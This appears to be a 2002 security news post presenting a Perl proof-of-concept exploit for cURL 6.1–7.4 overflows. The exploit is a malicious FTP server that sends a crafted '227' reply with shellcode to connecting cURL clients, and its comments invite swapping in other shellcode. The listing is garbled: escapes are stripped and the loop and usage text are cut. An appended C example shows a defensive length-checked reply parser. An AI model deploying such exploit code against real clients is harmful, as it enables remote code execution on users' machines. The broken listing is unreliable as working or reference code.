Remote linux cURL exploit for versions 6.1 - 7.4

by Nikola Strahija on May 6th, 2002

Here is some PoC code for the recent cURL overflows (Linux version). Exploits will also be posted at http://www.snosoft.com/research/


#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
#
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,
# may only be used for testing purposes. Additionally, the author does not
# take any responsibilities for abuse of this file. More information about
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer
# manipulation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org

use IO::Socket;
use Net::hostent;

$shellcode = # does a open() write() close() and exit().
"xebx40x5ex31xc0x88x46x0exc6x46x21x09xfex46x21".
"x88x46x22x8dx5ex0fx89x5ex23xb0x05x8dx1ex66xb9".
"x42x04x66xbaxe4x01xcdx80x89xc3xb0x04x8bx4ex23".
"x66xbax0fx27x66x81xeaxfcx26xcdx80xb0x06xcdx80".
"xb0x01x31xdbxcdx80xe8xbbxffxffxffx2fx74x6dx70".
"x2fx30x77x6ex65x64x2ex74x78x74x23x30x77x6ex65".
"x64x20x62x79x20x61x20x63x55x52x4cx20x3bx29";

while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}


$id = `id -u`; chop($id);
$size = 249;
$esp = 0xbffff810;
$offset = -150 unless $offset;
$port = 21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print
Option: $0 -o

Note: low ports require root privileges

TWENTE
exit;

}

for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;

while($cl = $sock->accept()) {

$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;

}
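
A defensive counterpart to the listing above, as an added example that is not part of the original post and is not cURL's own code: a client-side parser for the 227 reply that the listing's fake FTP server sends, which checks the line length and validates the six address fields instead of copying the reply into a fixed-size buffer. MAX_REPLY_LINE, the function and type names, and the sample replies are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REPLY_LINE 512  /* assumed cap for this example, not a cURL constant */

enum pasv_status { PASV_OK = 0, PASV_TOO_LONG = -1, PASV_NOT_227 = -2, PASV_MALFORMED = -3 };
struct pasv_addr { unsigned char ip[4]; unsigned short port; };

/* Parse one reply line of explicit length; the line is only read, never copied. */
enum pasv_status parse_pasv_reply(const char *line, size_t len, struct pasv_addr *out)
{
    unsigned v[6], val;
    size_t i, n = 0, digits;

    if (len > MAX_REPLY_LINE)               /* length check before any parsing */
        return PASV_TOO_LONG;
    if (len < 4 || memcmp(line, "227", 3) != 0 || line[3] != ' ')
        return PASV_NOT_227;
    for (i = 4; i < len && (line[i] < '0' || line[i] > '9'); i++)
        ;                                   /* skip free text before h1 */
    while (n < 6) {                         /* expect h1,h2,h3,h4,p1,p2 */
        val = 0; digits = 0;
        while (i < len && line[i] >= '0' && line[i] <= '9' && digits < 3) {
            val = val * 10 + (unsigned)(line[i] - '0');
            i++; digits++;
        }
        if (digits == 0 || val > 255) return PASV_MALFORMED;
        v[n++] = val;
        if (n < 6) {                        /* fields are comma separated */
            if (i >= len || line[i] != ',') return PASV_MALFORMED;
            i++;
        }
    }
    if (i < len && line[i] >= '0' && line[i] <= '9') return PASV_MALFORMED;
    for (n = 0; n < 4; n++) out->ip[n] = (unsigned char)v[n];
    out->port = (unsigned short)(v[4] * 256 + v[5]);
    return PASV_OK;
}

int main(void)
{
    /* Constructed inputs: a well-formed reply and a 227 reply padded with 249 filler bytes. */
    const char *ok = "227 Entering Passive Mode (192,168,0,10,19,137)";
    char filler[253];
    struct pasv_addr a;
    memcpy(filler, "227 ", 4); memset(filler + 4, 'A', 249);
    printf("valid:  %d\n", (int)parse_pasv_reply(ok, strlen(ok), &a));
    printf("filler: %d\n", (int)parse_pasv_reply(filler, sizeof filler, &a));
    return 0;
}
```
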

